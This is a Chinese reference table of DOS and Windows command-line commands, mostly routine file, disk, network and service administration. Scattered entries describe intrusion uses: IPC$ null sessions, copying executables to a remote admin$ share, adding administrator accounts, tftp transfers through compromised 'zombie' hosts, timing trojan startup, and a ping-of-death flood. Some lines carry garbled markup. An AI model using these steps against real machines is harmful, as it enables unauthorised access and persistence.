dos基础  dos命令部分  dos命令全部

大类 关键字 格式或参数 功能 详细说明
adprep 域控制器准备工具
append 添加附加目录 Allows programs to open data files in specified directories as if they were the current directory. in
网络配置与管理 arp IP地址解析  查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
网络配置与管理 arp /a 显示所有网卡的ARP缓存记录;
网络配置与管理 arp /d 删除arp缓存内容; 一旦能上网就立即将网络断掉(禁用网卡或拔掉网线),再运行arp –a;  ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断
网络配置与管理 arp -s ip EtherAddr 绑定Ip地址和物理地址(-d是删除绑定);(Mac地址用连字符-连接6个16进制2位数组成;-s的绑定在关机后会删除
文件管理 Assoc [.ext[=filetype]]] 显示或修改文件扩展名关联。Assoc .iso可查看关联的打开程序
文件管理 Assoc assoc .iso= 删除.iso扩展名与所属文件类型之间的关联设置;
文件管理 Assoc assoc .iso=winiso 修复iso扩展名与winiso这种文件类型之间的关系;winiso通常指程序名称;
系统进程与任务管理 at [\\Pcname]hours:minutes[/interactive] [{/every:date[,…]}]command] [\\Pcname]指远程计算机;[id}指定指派给已计划命令的识别码;/delete取消已计划的命令;/yes对来自系统的回答都进行肯定的回答;
系统进程与任务管理 at at 20:00 shutdown -s 在晚上8:00有一个关机的提示的对话框;/s关闭计算机。
系统进程与任务管理 at at 15:30 net send 172.20.100.25 "消息内容" 在指定时间向指定计算机发送消息;
系统进程与任务管理 at at \\marketing 显示marketing服务器上已计划的命令列表;
系统进程与任务管理 at at \\marketing 3 了解marketing服务器上识别码为3的命令的详细信息;
系统进程与任务管理 at at \\corp 08:00 cmd /c "net share reports= d:\marketing\reports>>\\maintenance\reports\cort.txt" 计划在8:00在cort服务器上运行net share命令,并将该列表重定向到maintenance服务器的corp.txt中;先远程登录:net use //192.168.1.8\user:"administrator" pw
系统进程与任务管理 at at \\marketing 00:00 /every:5,10,15,20,25,30 archieve 每隔5天在午夜将marketing服务器的硬盘驱动器备份到磁带驱动器(archive.com是一个预先建立好并含有备份命令的批处理程序)。
系统进程与任务管理 at at id号  开启已注册的某个计划任务
系统进程与任务管理 at at /delete  停止所有计划任务,用参数/yes则不需要确认就直接停止
系统进程与任务管理 at at id号 /delete  停止某个已注册的计划任务
系统进程与任务管理 at  [\\Pcname][{[id][/delete]|/delete[/yes]}] 制订计划 让PC在指定的日期和时间运行指定的命令和程序
系统进程与任务管理 at  查看所有的计划任务
系统进程与任务管理 at  at \\ip time 程序名(或一个命令) /r  在某时间运行对方某程序并重新启动计算机
文件管理 attrib  文件名 -A -R -S -H 或 +A +R +S +H  去掉(添加)某文件的存档、只读、系统、隐藏属性;
batch batch bat.bat 在系统恢复控制台中,无法直接执行.bat or .cmd,可用batch命令去执行;
系统诊断与恢复 bcdedit 管理启动配置数据存储
bootcfg 设置Boot.ini
config&dos break [on | off] 检查Crtl+c 即配置ctrl+c的检查状态
config buffers 磁盘缓冲区
文件管理 cacls  文件名 参数 显示或修改文件访问控制列表(ACL)access control list 针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。
批处理命令 call  路径\批处理文件名  从批处理程序中调用另一个批处理程序
certreq 申请证书
文件管理 cd [x:][path] 改变当前目录chdir x:如果直接进入某一根目录,则直接输入盘符即可,不需要另处再加CD命令。如果事先x:目录有展开,就进入其子目录,此时可加以一命令:cd\(/d是一个参数开关,可以改变当前驱动器);
文件管理 cd.. 返回上一级
文件管理 cd\ 返回到根目录 或cd.
server os change 终端服务更改 管理终端服务器
chcp 活动控制台代码页
chglogon 复写会话登录
chgport 列出或改变com端口映射
磁盘管理 chkdsk  /F D: check disk  检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误
chkntfs 1 设置chkdsk 对系统启动时的自动检测进行控制.默认情况下,vista在启动时会对所有磁盘进行检查,并在必要时启动chkdsk.exe来修复存在的错误.有两个工具可用于对启动时的自动磁盘检查进行控制,分别是autochk与chkntfs。os启动时,会启动自动检测,以便对驱动器进行自动检查.不能直接调用自动检测,但可以使用NTFS检测来控制其工作方式.通过NTFS检测,可以决定计算机下一次启动时是否对磁盘进行检查,也可以更改磁盘自动检查的选项.
chkntfs chkntfs /t:numSeconds 启动时在自动检测前可以取消,有一个倒计时,可以设置其时间长度;
chkntfs chkntfs /x d: e: 设置启动时不自动检查
chkntfs chkntfs /c d: e: 设置启动时自动检查(也是默认选项)
批处理 choice CHOICE [/C choices] [/N] [/CS] [/T timeout /D choice] [/M text] 显示提示信息并暂停批处理程序,等待用户输入
cipher 文件加密 EFS的DOS工具,Encrypting File System
clip 将命令结果输出到剪贴板 dir |clip;clip < readme.txt;
命令提示符管理 cls 清屏
命令提示符管理 cmd 命令行  启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;命令扩展是按默认值启用的
cmstp “连接管理器”服务配置
命令提示符管理 color 定制命令窗口颜色  颜色值设置cmd控制台前景和背景颜色; 0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
文件管理 Compact NTFS压缩 显示或更改NTFS分区上文件的压缩。
文件管理 Comp 文件比较 比较两个或两套文件的内容。
磁盘管理 Convert 分区系统类型转换 将FAT卷转换成NTFS。您不能转换当前驱动器。
文件管理 copy [x:][path]<源文件名> [x:][path][目标名] 文件复制,可以使用通配符,要复制文件夹中所有的文件和子文件夹,使用xcopy
文件管理 copy  路径\文件名1  路径\文件名2 /y  复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件
文件管理 copy  c:\srv.exe $">\\ip\admin$  复制本地c:\srv.exe到对方的admin下
文件管理 copy $\svv.exe">\\ip\admin$\svv.exe c:\  或:copy\\ip\admin$\*.*  复制对方admini$共享下的srv.exe文件(所有文件)至本地C:
文件管理 copy  1st.jpg/b+2st.txt/a 3st.jpg  将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件, 注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件
文件管理 copy con c:\>copy con wwu.txt 在C盘的根目录下建立wwu.txt,然后输入内容,回车换行,F6或CTRL+Z结束输入;
country 国家设置
cprofile 清理配置文件
Cscript 在命令行中启动脚本.vbs、.js等
系统时间与日期管理 date date /t 、 time /t  显示或设置系统日期。
dcgpofix 组策略还原工具
dcpromo 活动目录向导
系统配置与调试 debug 调试 测试和调试dos可执行文件
磁盘管理 defrag [x:] 分区碎片整理
文件管理 del <filename> 删除一个或多个指定文件;erase 如果要删除的文件具有只读、隐含、系统属性,则需attrib命令去掉其属性;可以使用通配符;del *.jpg
文件管理 del /AR del /AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。
文件管理 del /S del /S /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。
文件管理 deltree [x:][path]<目录名>[/y] 删除目录树 删除目录及目录下的所有文件及子目录
系统配置文件命令 device device=path 将驱动程序加载到内存
devicehigh 将驱动程序加载到高内区
文件管理 dir [x:][path][pam1]… 显示指定目录下的目录和文件, dir/as可以显示当前目录下的系统或隐藏文件;
文件管理 dir  查看文件信息 参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间
文件管理 dir  dir /a 显示包括隐藏文件和系统文件在内的所有文件和文件夹;
磁盘管理 Diskcomp 磁盘比较 比较两个软盘的内容。
磁盘管理 diskcopy 源驱动器名 目标驱动器名 软盘复制 先插入源盘,diskcopy a: a:(系统会提示插入目标盘)
如果源盘是启动盘,复制后的盘也可以启动;
磁盘管理 Diskpart 磁盘和分区管理 显示或配置磁盘分区属性。是一个集成环境,进入后,提示符会为diskpart>,只能执行diskpart相关的命令,如果要执行其他DOS命令,先exit退出;
dos 指定UMA链接
dosonly 防止启动程序 (防止用户从command.com提示符启动其他不基于msdos的应用程序;)
命令提示符管理 doskey 命令存储 在内在中开辟缓冲区并将执行过的命令保存在缓冲区中,这样就可以随时调用 前输入过的命令;
doskey 宏名=命令1 $t 命令2 $t etc 如:dosdey exe=dir *.exe $t dir *.com $t dir *.bat完成后,键入exe,回车,即可显示当前目录下所有的exe,com,bat文件;Doskey包含了很多快捷键;
命令提示符管理 doskey  要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。 撤销命令行(命令行宏) 1 编辑命令行 2调用Windows命令  3 创建宏。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);
解锁:doskey dir=   
系统信息与帮助 Driverquery 查询系统驱动; 显示当前设备驱动程序状态和属性。
活动目录 dsadd 添加对象
活动目录 dsget 显示对象
活动目录 dsmod 修改对象
活动目录 dsmove 移动对象
活动目录 dsquery 查找对象
活动目录 dsrm 删除对象
批处理命令 echo  on或off echo %1  打开或关闭echo,仅用echo不加参数则显示当前echo设置
批处理命令 echo  信息  在屏幕上显示出信息
批处理命令 echo  信息 >> pass.txt  将"信息"保存到pass.txt文件中;向输出中写入信息;
批处理命令 Echo. 显示一空行
系统配置文件命令 echoconfig
文件管理 edit edit[[x:][path][filename] [/b][/g][/h][/nohi] 编辑指定文件
edlin 面向行的文本编辑器
批处理命令 Endlocal 结束批文件中环境更改的本地化。
文件管理 Erase 删除一个或多个文件。
批处理命令 errorlevel 环境变量,可以追踪最近使用命令的退出代码;chkdsk命令的返回代码:0:没有发现错误,1:已找到并修复;2:已执行磁盘回复;3:未指定"/f"选项,无法检查磁盘;
eventcreate 自定义事件
eventtriggers 事件触发器
evntcmd 事件陷阱
系统诊断与恢复 eventvwr 事件查询
exit 退出命令行
expand 解压缩文件 解压光盘中的压缩文件
extract 从安装盘提取文件
文件管理 fc fc one.txt two.txt > 3st.txt  对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令
文件管理 Fc 比较两个文件或两个文件集并显示它们之间的不同。
磁盘管理 fdisk 磁盘分区 磁盘需要格式化、分区以后才可以使用;可分区并指定逻辑分区、活动分区及主分区;
文件管理 find  文件名 查找  查找某文件,搜索完后会显示所有的包含行;
文件管理 Find for %f in (*.bat) do find "prompt" %f 搜索一组文件;
文件管理 findstr  "Hello" aa.txt  在aa.txt文件中寻找字符串hello
文件管理 Findstr 使用正则表达式搜索文本;
dos finger  username @host 查看登录用户信息  查看最近有哪些用户登陆
批处理命令 for 批处理中较常见  对一组文件中的每一个文件执行某个特定命令
forfiles 选择要进行批处理的文件;
forfiles 列出目录下所有文件的扩展名 forfiles /p c:\test /s /m *.* /c "cmd /c  echo extension of @file is 0x09@ext0x09"
forfiles 列出目录下所有文件的文件名 forfiles /p c:\test /s /m *.* /c "cmd /c  echo @file is one of files"  @fname是无扩展名的文件名;
focedos 启用子程序
磁盘管理 format [x:][/q] 磁盘格式化 磁盘需要格式化、分区以后才可以使用
磁盘管理 format  盘符 /FS:类型  格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS
磁盘管理 Fsutil 显示或配置文件系统的属性。
Fsutil fsutil fsinfo drives 查看所有驱动器的名称
Fsutil fsutil fsinfo drivetype x: 查看驱动器的类型
Fsutil fsutil fsinfo volumeinfo x: 相看卷的信息
网络登录与管理 ftp  ip 端口 上传下载命令 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)
ftp 登录服务器 ftp 192.168.1.22,输入账号和密码,执行?即可查看FTP的子命令
文件管理 Ftype 显示或修改用在文件扩展名关联的文件类型。Fype |more;assoc负责文件扩展名和文件类型之间的关联,而Ftype负责文件类型和应用程序之间的关联;
网络配置与管理 getmac 查看网卡mac地址
gettype 设置系统环境变量 获得系统信息
批处理命令 goto  标签 批处理定向(跳转) 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)
dos Gpresult 查看组策略 显示机器或用户的组策略信息。
dos Gpresult /r  Displays RSoP summary data.resultant set of policy
gpupdate 刷新组策略
系统配置与调试 Graftabl 启用Windows在图形模式显示扩展字符集。
系统信息与帮助 help 列出当前可以使用的全部命令;
hostname 显示主机名;\\计算机名;
dos Icacls 管理文件系统的访问权限 显示、修改、备份或还原文件和目录的ACL。
批处理命令 if  批处理  在批处理程序中执行条件处理(更多说明见if命令及变量)
install 内存驻留程序到内存
网络配置与管理 ipconfig 显示TCP/IP网络配置  (winipcfg) 显示网络配置;用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息
ipseccmd 在注册表中配置安全策略
ipxroute 显示路由表
irftp 红外发送文件
磁盘管理 Label 创建、更改或删除磁盘的卷标。
loadfix 装入固定内存
lodctr 性能计数
loadhigh 高内存装载
logman 管理日志
logoff 终止会话
macfile 管理服务器
文件管理 md [x:][path][子目录名] 建立子目录  创建目录
系统配置与调试 mem  显示内存分配 查看cpu使用情况
mmc 管理控制台 microsoft management console
系统配置与调试 mode 系统设置
more 单屏输出 more <11.txt;more 11.txt;type 11.txt |more;
mountvol 设置装入点
文件管理 move  x:\路径\源文件名 目标路径\目标文件名 移动文件 用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
msiexec windows installer服务
系统进程与任务管理 msinfo32
msg 消息发送
mstsc 远程桌面连接
dos nbtstat   -A ip NetBIOS统计数据 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写
网络服务配置与管理 net 网络综合命令 管理网络、服务、用户、登录等本地或远程信息;子命令
网络服务配置与管理 net localgroup administrators  用户名 /add 把“用户”添加到管理员中使其具有管理员权限
系统信息与帮助 net 管理网络服务
网络服务配置与管理 net config  显示系统网络设置
网络服务配置与管理 net help 网络帮助
网络服务配置与管理 net logoff 断开连接的共享
网络服务配置与管理 net password  密码  更改系统登陆密码
网络服务配置与管理 net pause  服务名  暂停某服务
网络服务配置与管理 net send  ip "文本信息"  向对方发信息
网络服务配置与管理 net share  查看本地开启的共享
网络服务配置与管理 net share   ipc$  开启ipc$共享
网络服务配置与管理 net share   ipc$ /del  删除ipc$共享
网络服务配置与管理 net share   c$ /del  删除C:ipc$共享
网络服务配置与管理 net start  查看开启了哪些服务 (如: net start schedule)net start telnet,开启telnet服务;net start spooler,开启后台打印机服务
网络服务配置与管理 net stop 服务名  停止某服务.net stop telnet,关闭telnet服务;net stop spooler,停止后台打印机服务
网络服务配置与管理 net time  \\目标ip  查看对方时间
网络服务配置与管理 net time  \\目标ip /set  设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息.获得服务器时间,黑客查看入侵计算机的时间,以便设置木马启动
网络服务配置与管理 net use  $">\\ip\ipc$ " " /user:" "  建立IPC空链接
网络服务配置与管理 net use  $">\\ip\ipc$ "密码" /user:"用户名"  建立IPC非空链接
网络服务配置与管理 net use h: $">\\ip\c$ "密码" /user:"用户名"  直接登陆后映射对方C:到本地为H:
网络服务配置与管理 net use h: $">\\ip\c$  登陆后映射对方C:到本地为H:
网络服务配置与管理 net use  $">\\ip\ipc$ /del  删除IPC链接
网络服务配置与管理 net use  h: /del  删除映射对方到本地的为H:的映射
网络服务配置与管理 net user  guest 12345  用guest用户登陆后用将密码改为12345
网络服务配置与管理 net user  用户名 密码 /add  建立用户
网络服务配置与管理 net user  guest /active:yes  激活guest用户
网络服务配置与管理 net user   查看有哪些用户
网络服务配置与管理 net user  帐户名:  查看帐户的属性
网络服务配置与管理 net view 查看本地局域网内开启了哪些共享
网络服务配置与管理 net view  \\ip  查看对方局域网内开启了哪些共享
网络服务配置与管理 netsh  服务器管理 查看或更改本地网络配置情况
网络配置信息的管理与设置 netsh  服务器管理 检测网络连接状态,可以显示本机的核心路由表,相看活动连接,获取端口列表,及统计通信流量;
网络配置与管理 netsh  network service shell 服务器管理 查看或更改本地网络配置情况
网络配置与管理 netsh interface
网络配置与管理 netsh show
网络配置与管理 netstat 显示活动的TCP连接、计算机侦听的端口、以太网统计信息、IP路由表、IPV4统计信息、IPV6统计信息;如果不带参数,则显示活动的TCP连接;
网络配置与管理 netstat  -a  查看网络连接信息 查看开启了哪些端口,常用netstat -an
网络配置与管理 netstat  -n  查看网络连接信息 查看端口的网络连接情况,常用netstat -an
网络配置与管理 netstat  -v 查看网络连接信息  查看正在进行的工作
网络配置与管理 netstat  -p 协议名 查看网络连接信息 netstat -p tcq/ip查看tcp/ip协议使用情况
网络配置与管理 netstat  -s  查看网络连接信息 查看正在使用的所有协议使用情况
dos nslookup 管理DNS服务
ntbackup 备份操作
ntcmdprompt 运行cmd.exe,不是command.com
活动目录 ntdsutil 活动目录管理
dos open  ip  连接到IP(属telnet登陆后的命令)
dos Openfiles 显示远程用户为了文件共享而打开的文件。
文件管理 path [x:][path][;];[x:][path][;…] 为可执行文件显示或设置搜索路径。 在执行DOS外部命令时,DOS首先在当前盘当前目录中寻找该文件,若找到,则运行;若找不到,DOS就会到path命令所设置的路径中,继续查找该文件,以便执行;有变量%path%
网络配置与管理 pathing 网络路径测试 显示丢失信息
网络配置与管理 pathping 路径测试
批处理命令 pause 暂停  暂停批处理程序,并显示出:请按任意键继续....
pbadmin 管理电话簿
pentnt 浮点运算
perfmon 性能控制台
网络配置与管理 ping  ip(或域名)  IP连接测试 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
网络配置与管理 ping  -t -l 65550 ip  死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
文件管理 print  文件名  打印文本文件
命令提示符管理 prompt  名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为:EntSky\ )
网络服务配置与管理 Pushd 存储当前目录 保存当前目录,然后对其进行更改。
powercfg 管理电源设置
query 终端服务查询
quser 列举登录用户
rasdial 自动建立连接
文件管理 rd [x:][path][子目录名] 删除子目录;rmdir 子目录必须是空的
磁盘管理 Recover 数据恢复 从损坏的磁盘中恢复可读取的信息。
reg 修改注册表子项 导入可以通过建立文本文件,然后改为reg文件,双击打开即可;
注册表管理 reg query reg query,add,compare,copy,delete,export,import save,load,unload,restore 子命令
注册表管理 regedit  /s 注册表文件名 注册表编辑器 导入注册表;参数/S指安静模式导入,无任何提示;
注册表管理 regedit  /e 注册表文件名  导出注册表(注册表扩展名为.reg)
注册表管理 regsvr32 将dll文件注册为命令 将dll文件注册为注册表中的命令; 是windows中控件文件(dll\ocx\cpl)的注册与反注册工具;对应启用/取消某一功能;
系统诊断与恢复 relog 导出性能日志文件;
批处理命令 REM  文本内容 注释  在批处理文件中添加注解
文件管理 ren <旧文件名> <新文件名> 重命名文件名rename 如果要删除的文件具有只读、隐含、系统属性,则需attrib命令去掉其属性;可以使用通配符;ren *.txt *.dat
文件管理 replace  源文件 要替换文件的目录 替换文件  替换文件
reset 重置会话
文件管理 Robocopy 复制文件和目录树的高级实用程序
网络配置与管理 route print 操作网络IP路由表  显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface
runas 作为其它用户运行
系统服务 Sc 有子命令 服务控制 显示或配置服务(后台处理)。
Sc sc start serviceName
Sc sc pause serviceName
Sc sc continue serviceName
Sc sc stop serviceName
Sc sc \\Mailer1 start serviceName
Sc sc config serviceName start= flag(auto\demand\disabled\delayed-auto)
Sc 配置服务的启动方式
Sc sc create wlog binpath=f:\log.exe; 创建服务,如果是非服务程序要使用instsrv.exe,srvany.exe;
Sc sc delete wlog 也可以删除:
系统进程与任务管理 Schtasks 任务计划 安排命令和程序在一部计算机上按计划运行。
系统进程与任务管理 schtasks 计划任务管理;
scandisk 磁盘扫描
secedit 配置模板
批处理命令 set  %指定环境变量名称%= "指派给变量的字符"  设置环境变量
批处理命令 set 无参数  显示当前所有的环境变量
批处理命令 set  p(或其它字符) 临时改变  显示出当前以字符p(或其它字符)开头的所有环境变量
系统配置文件命令 set 设置环境变量
批处理命令 Setlocal 环境变量的本地化 开始用批文件改变环境的本地化。
批处理命令 setx 永久改变set设置; setx path "%path%;c:\users\wwuhn" 需要注销后才可以查看到新的设置路径,或者在系统属性的环境变量里查询;
系统诊断与恢复 sfc  /scannow 系统文件扫描验证; 扫描错误并复原system file check
批处理命令 Shift 更改参数的位置 调整批处理文件中可替换参数的位置。
系统进程与任务管理 Shutdown 关闭或重启计算机 让机器在本地或远程正确关闭。
Shutdown shutdown /s /t 1
Shutdown shutdown \\system /s /t 1
Shutdown shutdown /a /m \\system 取消远程计算机的延迟关机;
shutdown /r 重启
Sort 排序 将输入排序。
系统进程与任务管理 start  程序名或命令 /max 或/min  打开单独视窗运行指定程序或命令。 新开一个新窗口并最大化(最小化)运行某程序或命令;如start calc.exe
磁盘管理 Subst 磁盘映射关联 虚拟驱动器 将驱动器号与路径关联。
dos sys [x:] 传送系统 传送DOS启动程序到指定的空的目标盘包括io.sys,msdos.sys.command.com
系统信息与帮助 Systeminfo 系统信息 显示机器的具体的属性和配置。
takeown 成为文件所有者
tapicfg TAPI应用程序目录分区
系统进程与任务管理 taskkill  -F 进程名 结束任务进程 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
系统进程与任务管理 Taskkill taskkill /pid 936 终止正在运行的进程或应用程序。
系统进程与任务管理 Tasklist 显示任务进程 显示包括服务的所有当前运行的任务。
系统进程与任务管理 taskmgr  调出任务管理器
tcmsetup 设置TAPI
网络登录与管理 telnet  ip 端口 远程登录  远程登陆服务器,默认端口为23
网络登录与管理 telnet  在本机上直接键入telnet 将进入本机的telnet
dos tftp  -i 自己IP get server.exe c:\server.exe (用肉机作跳板时这用肉机IP)  登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送
dos tftp  -i 对方IP put c:\server.exe 日常文件传输协议  登陆后,上传本地c:\server.exe至主机
系统时间与日期管理 Time 系统时间 显示或设置系统时间。
命令提示符管理 title  标题名字 命令行窗口标题  更改CMD窗口标题名字
dos tlist  -t  以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
dos tlntadmn  远程管理telnet server tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口
tracept 设置跟踪程序
网络配置与管理 tracert  -参数 ip(或计算机名)  数据包跟踪诊断 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
文件管理 tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称
文件管理 type <filename> 显示txt文件内容 使用copy命令也可以达到同样效果,copy x.txt con
typeperf 性能计数器
unlodctr 删除计数器
系统信息与帮助 ver 系统版本  在DOS窗口下显示版本信息
dos Verify 告诉Windows验证文件是否正确写入磁盘。
磁盘管理 Vol 卷标 显示磁盘卷标和序列号。
磁盘管理 vssadmin 查看卷影副本 卷影复制服务管理命令行工具
系统时间与日期管理 w32tm 时间服务
waitfor 同步计算机
系统诊断与恢复 wevtutil 管理事件日志; 事件是指OS中发生的那些显著的需要用户或管理员加以注意的操作,用于管理事件日志的windows服务称为windows event log服务:应用程序日志:%systemRoot%\system32\winevt\logs\application.evtx.
文件管理 where where /r c:\ *.exe 文件类型位置 显示搜索到的C盘目录下所有的.exe的文件的位置;
winnt 安装windows xp系统i386下的安装命令;
winnt32 安装windows 在16位实模式下使用winnt.exe,在32位下使用winnt32.exe和setup.exe;
winpop POP3服务管理
系统信息与帮助 winver  弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)
dos Wmic 在交互命令外壳里显示WMI信息。
文件管理 xcopy [x:][path]<源文件或文件名>[x:][path][目标文件名][/s][/e] 子目录及文件拷贝 xcopy \wwu\*.* d: \wwu
文件管理 xcopy 源文件或目录树 目标地址\目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件
whoami 显示计算机名和用户名